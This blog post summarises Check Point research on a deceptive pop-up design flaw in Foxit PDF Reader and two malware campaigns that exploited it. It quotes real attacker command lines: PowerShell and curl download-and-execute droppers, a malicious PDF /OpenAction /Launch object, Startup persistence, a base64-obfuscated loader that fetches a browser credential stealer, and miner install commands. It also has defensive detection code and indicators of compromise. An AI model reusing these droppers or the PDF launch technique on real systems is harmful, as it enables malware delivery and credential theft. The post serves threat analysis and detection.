Flawed Design Attack on Foxit PDF Reader

Imène ALLOUCHE
May 22, 2024


Released By: Imène ALLOUCHE

Credits to: Checkpoint

I’ve been reading about the latest cyberattacks, and one in particular caught my eye: “Foxit PDF Reader Flawed Design Exploited to Deliver Malware Arsenal.”

Yes! User interface spoofing and deceptive design attacks are once again proving to be far from trivial vulnerabilities, and ones that shouldn’t be neglected.

A New Threat in Everyday Tools

I am more than sure that everyone has used Portable Document Format (PDF) files at least once in their lives (whether you have created one, downloaded one or read one). They are a cornerstone of modern communication that offers a reliable way to share formatted content across various platforms.

However, recently, Check Point researchers have revealed a serious vulnerability in Foxit PDF Reader, a popular alternative to Adobe Acrobat Reader with over 700 million users worldwide.

The attack exploits the design of Foxit’s security warnings: it tricks users into running malicious commands, and it has been used for both e-crime and espionage.

How Does the Attack Work

Imagine opening a PDF and being greeted by a security pop-up. You might expect a clear warning like “This file could harm your device. Do you want to open it?” But what if the message is trickier, with a pre-selected “Open Now” button that actually triggers malware?

This is the reality for millions of Foxit Reader users targeted by a cunning social engineering attack. Let’s break down the technical aspects and why it’s so sneaky.

The Design Flaw Idea Behind

The core of this attack lies in the design of Foxit Reader’s security warnings. Unlike a clear yes-or-no prompt, these warnings have a default “OK” button, which, in this case, is the most dangerous option.

Researchers discovered that after the initial “Trust this document?” pop-up (which should be clicked in most cases), a second one appears. This second pop-up, with “Open” pre-selected, is the real culprit. An unsuspecting user who clicks “OK” a second time without carefully reading the warning might unknowingly grant permission to execute malicious code.

First pop-up warning [Credits to Check Point]
Second malicious pop-up [Credits to Check Point]

Technical Overview: Bypass Traditional Defenses

This attack bypasses traditional defenses in a clever way. Most antivirus and sandbox environments primarily focus on vulnerabilities in Adobe Reader, the dominant PDF reader. Since this exploit targets a design flaw specific to Foxit Reader, it can fly under the radar of these security solutions.

How?

To understand the technical side, Check Point researchers attached a debugger (a tool used to analyze software behavior) to the reader.

When the user clicks “OK” on the second pop-up, a malicious command is triggered. This command uses PowerShell, a built-in Windows scripting tool, to download a malicious file from a remote server and then execute it.

Debugger showing the command triggered [Credits to Check Point]

"C:\Windows\System32\cmd.exe" /c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe', 'payload.exe')" >> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat &@echo start payload.exe >> msd89h2j389uh.bat &@echo Set oShell = CreateObject ("Wscript.Shell") >> encrypted.vbs &@echo Dim strArgs >> encrypted.vbs &@echo strArgs = "cmd /c msd89h2j389uh.bat" >> encrypted.vbs &@echo oShell.Run strArgs, 0, false >> encrypted.vbs & encrypted.vbs &dEl encrypted.vbs

If you are interested in a detailed explanation of the triggered command, check my article: “Foxit Design Flaw Exploit - Technical Explanation of the malicious triggered command”.

However, for the sake of simplicity and clarity, here’s a simplified explanation of the malicious command:

  • It navigates to the temporary folder (%TEMP%) and creates its working files there.
  • It downloads a file from a suspicious web address (defanged here as “hxxps”) and saves it under the name “payload.exe”.
  • It creates a batch file that waits a few seconds, starts “payload.exe” (the downloaded malware), and then deletes itself to avoid detection.
  • Finally, it creates a script to execute the batch file silently, and that script deletes itself as well.
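The chain above (the PDF reader spawning cmd.exe, which in turn runs a PowerShell download cradle) is visible in process-creation telemetry. The following is an added example written for this post, not Check Point’s code: it scores constructed Sysmon-style records (field names Image, ParentImage, CommandLine are Sysmon’s; the file paths, user name and URL in the sample records are invented).

```python
from typing import Optional

# Constructed Sysmon-style process-creation records (Event ID 1 field names);
# sample data made for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c cD %tEMP% &@echo powershell -Command ...'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -Command \"(New-Object Net.WebClient).DownloadFile('https://example.invalid/x', 'payload.exe')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe",
     "CommandLine": r'"FoxitPDFReader.exe" C:\Users\alice\Downloads\report.pdf'},
]

PDF_READERS = {"foxitpdfreader.exe", "foxitreader.exe", "acrord32.exe", "acrobat.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
DOWNLOAD_MARKERS = ("downloadfile", "net.webclient", "invoke-webrequest", "curl ")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Score one process-creation event. A PDF reader spawning a shell is the
    /Launch pattern itself; a shell carrying a download cradle is the second stage."""
    parent, child = _basename(event["ParentImage"]), _basename(event["Image"])
    cmd = event.get("CommandLine", "").lower()
    if parent in PDF_READERS and child in SHELLS:
        return "high"
    if child in SHELLS and any(marker in cmd for marker in DOWNLOAD_MARKERS):
        return "medium"
    return None


def scan(events: list) -> list:
    """Return (index, severity) for every event worth alerting on."""
    return [(i, sev) for i, e in enumerate(events) if (sev := classify(e))]


if __name__ == "__main__":
    for i, sev in scan(SAMPLE_EVENTS):
        print(f"[{sev}] event {i}: {SAMPLE_EVENTS[i]['Image']}")
```

A normal reader launch (event 2) is not flagged; only the reader-to-shell edge and the download cradle are.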

Once the “OK” button has been clicked, the PDF metadata changes, and if we analyze the PDF file statically we can obtain the executed logic behind it:

.\pdf-parser.py .\mlw.pdf
PDF Comment '%PDF-1.1\r\n'
obj 1 0
Type: /Catalog
Referencing: 2 0 R
<<
/OpenAction
<<
/S /Launch
/Win
<<
/F (CMD)
/P '(/c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile(\'hxxps://cdn.discordapp.com/attachments/1010643365152436226/1011056243474960515/Client_1.exe\', \'payload.exe\')" >> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat &@echo start payload.exe >>
obj 2 0
Type: /Pages
Referencing: 3 0 R
<<
/Kids [ 3 0 R ]
/Count 1
/Type /Pages
>>
obj 3 0
Type: /Page
Referencing: 5 0 R, 2 0 R, 4 0 R
<<
/Resources
<<
/Font
<<
/F1 5 0 R
>>
>>
/MediaBox [ 0 0 795 842 ]
/Parent 2 0 R
/Contents 4 0 R
/Type /Page
>>
obj 4 0
Type:
Referencing:
Contains stream
<<
/Length 1260
>>
obj 5 0
Type: /Font
Referencing:
<<
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Type /Font
>>
xref
trailer
<<
/Size 6
/Root 1 0 R
/ID [(bc38735adadf7620b13216ff40de2b26)(bc38735adadf7620b13216ff40de2b26)]
>>
startxref 1866
PDF Comment '%%EOF'

If you would like a detailed explanation of the static analysis of this PDF, check my article: “Foxit Design Flaw Exploit - Technical Explanation of the malicious triggered command”.

However, in order to keep it short and consistent, the most important thing to note in here is that the PDF points to an “OpenAction” that automatically runs a malicious program when opened in Foxit Reader due to a design flaw. This wouldn’t work in Adobe Reader by the way.
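The /OpenAction → /Launch structure shown by pdf-parser is exactly what a static check can key on. The example below is added for this post (it is not pdf-parser and not Check Point’s code): it scans the raw bytes of an uncompressed PDF for /Launch actions and pulls out the /F and /P strings. The embedded sample PDF is constructed here with a placeholder command; it assumes the objects are not inside compressed object streams, which this regex pass does not decode.

```python
import re

# Constructed sample, not the real malicious file: a minimal uncompressed PDF whose
# catalog carries an /OpenAction /Launch dictionary shaped like the pdf-parser output.
SAMPLE_PDF = b"""%PDF-1.1
1 0 obj
<< /Type /Catalog /Pages 2 0 R
   /OpenAction << /S /Launch /Win << /F (CMD) /P (/c echo placeholder \\(test\\)) >> >>
>>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

LITERAL = rb"\(((?:\\.|[^\\)])*)\)"   # PDF literal string, tolerating escaped parens


def _unescape(raw: bytes) -> str:
    return raw.replace(b"\\(", b"(").replace(b"\\)", b")").replace(b"\\\\", b"\\").decode("latin-1")


def find_launch_actions(data: bytes) -> list:
    """Locate every /Launch action in an uncompressed PDF and report its target (/F),
    parameters (/P) and whether it sits in an auto-firing /OpenAction or /AA dictionary."""
    hits = []
    for m in re.finditer(rb"/S\s*/Launch", data):
        start = data.rfind(b" obj", 0, m.start())        # start of the enclosing object
        end = data.find(b"endobj", m.end())
        obj = data[max(start, 0):end if end >= 0 else len(data)]
        f = re.search(rb"/F\s*" + LITERAL, obj)
        p = re.search(rb"/P\s*" + LITERAL, obj)
        hits.append({
            "file": _unescape(f.group(1)) if f else None,
            "params": _unescape(p.group(1)) if p else None,
            "auto_open": b"/OpenAction" in obj or b"/AA" in obj,
        })
    return hits


def verdict(data: bytes) -> str:
    hits = find_launch_actions(data)
    if not hits:
        return "clean: no /Launch action"
    auto = [h for h in hits if h["auto_open"]]
    return f"suspicious: {len(hits)} /Launch action(s), {len(auto)} fired automatically"
```

Foxit is the reader that executes such an action after the pop-ups; the presence of the action in the file is reader-independent, which is why a static gate at the mail or download boundary is the right place for this check.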

Diving Technically Deeper: A Case Study of Espionage

Check Point presented many cases in great detail that I suggest you check out; I will just provide a summary of some of them:

Case 01: Windows & Android Botnet Campaign:

Check Point researchers stumbled upon a malicious PDF named “Regarding Invitation to attend defence services Asia 2024 and National Security Asia 2024.pdf.” This deceptive title likely targeted individuals with an interest in these events. The PDF was likely distributed through a download link, not directly attached to emails.

The campaign relies on a straightforward attack chain. Once unsuspecting users download and open the PDF, it triggers a downloader script. This script silently downloads and executes two additional executables, which act as a two-pronged attack:

  • Data Exfiltration: The first executable focuses on data theft. It gathers sensitive information like documents, images, and databases, essentially acting as a digital spy for the attackers. It stores this stolen data in a folder called “%Appdata%/htdocs/”.
  • Android Expansion: The second executable hints at a broader campaign targeting not just Windows but also Android devices. It functions as a downloader for a known Android malware called Rafel RAT. This suggests the attackers aimed to compromise a wider range of devices beyond Windows machines.
Attack chain [Credits to Check Point]

If you analyze the “bot registration” files, you will pinpoint the peak activity of the campaign on April 5th, 2024. Additionally, the attack methods and targeted information suggest the involvement of APT-C-35, also known as the DoNot Team. This group is notorious for launching sophisticated cyberattacks aimed at espionage.

Let’s go deeper into the technical aspects of this campaign:

  • The script downloads two executables, “index.exe” and “upload.exe”:
    “index.exe”: steals various files (documents, images, etc.) from specific locations on the infected machine and stores them in a hidden folder.
    “upload.exe”: uploads the stolen files to the attacker’s server.
  • The malware uses custom encryption for critical information (file paths, server addresses).
  • It has persistence mechanisms to ensure it runs on every system startup.
  • Evidence suggests the attackers might have additional tools for stealing data or taking screenshots.
  • The campaign targets information like documents and databases.
  • The attackers might have tools for compromising Android devices as well (based on server contents).

The APT-C-35 group (also known as DoNot Team) is suspected to be behind this campaign due to the attack methods and targeted information.

Case 02: Chained-Campaign — Stealer and Miner Delivery via PDF

This case involved a malicious PDF campaign that deployed a stealer and two cryptocurrency miners on infected machines.

Attack chain [Credits to Check Point]
  1. The campaign used a PDF named “swift v2.pdf” to target Foxit PDF Reader users. It likely focused on users in the United States but affected others as well.
  2. The PDF exploited a User Interface vulnerability through a pop-up to trigger a command execution.
  3. The command downloaded a malicious BAT file named “mems.bat” to the “Public” folder.
/OpenAction
<<
/S /Launch
/Win
<<
/F '(c:\\\\windows\\\\system32\\\\cmd.exe)'
/P '(/c curl hxxps://sealingshop.click/bat/bostar4 -o "C:\\\\Users\\\\Public\\\\mems.bat" & C:\\\\Users\\\\Public\\\\mems.bat)'
>>
>>
  4. The BAT file opened a random website in the user’s browser, distracting them from the ongoing malicious activities.
  5. The BAT file downloaded a second BAT file (“WindowsUpdate.bat”) to the Startup folder for persistence (meaning it would run automatically on system reboot).
  6. It downloaded and installed Python 3.9 in the “Public” folder.
  7. Finally, it downloaded a Python script named “documents.py”.
  8. The “WindowsUpdate.bat” file used PowerShell to download and execute the “documents.py” script again on every reboot.
cmd /c start https://www.facebook.com/help/contact/1304188393453553?ref=payout_hub
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI hxxps://sealingshop.click/config/stu -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsUpdate.bat"
cmd /c mkdir "C:\\Users\\Public\\python39"
cmd /c curl hxxps://sealingshop.click/app/python39.zip -o "C:\\Users\\Public\\python39\\python39.zip"
cmd /c tar -xf C:\\Users\\Public\\python39\\python39.zip -C "C:\\Users\\Public\\python39"
cmd /c curl hxxps://sealingshop.click/py/bostar4 -o "C:\\Users\\Public\\python39\\documents.py"
cmd /c C:\\Users\\Public\\python39\\python.exe "C:\\Users\\Public\\python39\\documents.py"
  • The “documents.py” script was a Python loader that retrieved and executed another obfuscated Python script.
  • This second script functioned as an information stealer, targeting only Chrome and Edge browsers to steal credentials and cookies.
  • It contacted a Command and Control (C&C) server to upload the stolen information.
import os
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import requests
import json
import getpass
import sys
vari = ''
exec(base64.b64decode({2:str,3:lambda b:bytes(b, 'UTF-8')}[sys.version_info[0]]('dmFyaSA9IHJlcXVlc3RzLmdldCgnaHR0cHM6Ly9zZWFsaW5nc2hvcC5jbGljay9weWVuL2Jvc3RhcjQnKS50ZXh0')))
exec(base64.b64decode({2:str,3:lambda b:bytes(b, 'UTF-8')}[sys.version_info[0]](vari)))
  • The stealer script retrieved download URLs for two cryptocurrency miners: XMRig and Lol Miner.
  • It used PowerShell commands to download, unzip, and execute both miners.
  • The miners used the “PublicAlbums” and “PublicSounds” folders, respectively, to store their files.
os.system('cmd /c mkdir "C:\\Users\\Public\\PublicAlbums"')
os.system("powershell.exe -windowstyle hidden Invoke-WebRequest -URI " + url_miner_xmrig + " -OutFile C:\\Users\\Public\\PublicAlbums\\xmrig.zip")
os.system("powershell.exe -windowstyle hidden Expand-Archive C:\\Users\\Public\\PublicAlbums\\xmrig.zip -DestinationPath C:\\Users\\Public\\PublicAlbums")
os.system("cmd /c C:\\Users\\Public\\PublicAlbums\\config.vbs")
  • Both miners were downloaded from a malicious Gitlab repository (@topworld20241) and configured to connect to specific mining pools.
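The “documents.py” loader above hides its next stage behind exec(base64.b64decode(...)). When the wrapped argument is a literal, the layers can be peeled statically without ever running them. This is an added example for this post, not the campaign’s script: the sample loader is constructed here around a harmless placeholder stage, and the unwrapper stops, as it must, at the second exec on the page, whose argument is a variable fetched over the network rather than a literal.

```python
import ast
import base64


def _wrap(payload: str) -> str:
    """Build a loader line shaped like the page's, around payload (sample construction only)."""
    b64 = base64.b64encode(payload.encode()).decode()
    return ("import base64, sys\n"
            "exec(base64.b64decode({2:str,3:lambda b:bytes(b, 'UTF-8')}"
            f"[sys.version_info[0]]('{b64}')))\n")


# Constructed two-layer sample; the innermost stage is a placeholder, not the real stealer.
INNER = "vari = 'placeholder stage'\nprint(vari)\n"
SAMPLE_LOADER = _wrap(_wrap(INNER))


def _exec_string_args(tree: ast.AST):
    """Yield every string literal that appears anywhere inside an exec(...) call."""
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and node.func.id == "exec":
            for sub in ast.walk(node):
                if isinstance(sub, ast.Constant) and isinstance(sub.value, str):
                    yield sub.value


def unwrap_exec_b64(source: str, max_depth: int = 8) -> list:
    """Statically peel exec(base64.b64decode(<literal>)) layers without executing any.
    Returns the decoded layers outermost first; stops when no exec carries a decodable
    literal (for example when the argument is a variable filled from the network)."""
    layers = []
    for _ in range(max_depth):
        decoded = None
        for lit in _exec_string_args(ast.parse(source)):
            try:                      # 'UTF-8' and other non-base64 literals are skipped
                decoded = base64.b64decode(lit, validate=True).decode("utf-8")
                break
            except (ValueError, UnicodeDecodeError):
                continue
        if decoded is None:
            break
        layers.append(decoded)
        source = decoded
    return layers
```

Each recovered layer is source text that can be read for URLs and file paths before any dynamic analysis is attempted.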

Indicators of Compromise (IoCs):

  • Malicious PDF: “swift v2.pdf”
  • C&C server: retrieves the stolen information (URL not provided in the report)
  • Miner download URLs: not provided in the report, but likely retrieved from the C&C server
  • Gitlab repository: @topworld20241 (containing miner configuration files)
  • File paths:
    “C:\Users\Public\mems.bat” (initial BAT script)
    “C:\Users\Public\python39” (folder for the Python installation)
    “C:\Users\Public\python39\documents.py” (Python loader script)
    “C:\Users\Public\PublicAlbums\xmrig.zip” (XMRig miner archive)
    “C:\Users\Public\PublicAlbums\config.vbs” (XMRig miner configuration script)
    “C:\Users\Public\PublicSounds\lolMiner.exe” (Lol Miner executable)
    “C:\Users\Public\PublicSounds\lolMiner.vbs” (Lol Miner configuration script)

Final Word:

These two cases were the most intriguing for me. Check Point has documented many others, but I focused on understanding the script functionality and technical details of these specific campaigns. I’m impressed by the attackers’ sophistication in exploiting vulnerabilities for personal gain (cryptocurrency mining) rather than simply for amusement. The complex attack chains in these cases demonstrate the challenges of both exploitation and detection.

Resources and References


Imène ALLOUCHE

1CS student at ESI Algiers, CTF player and Cybersecurity enthusiast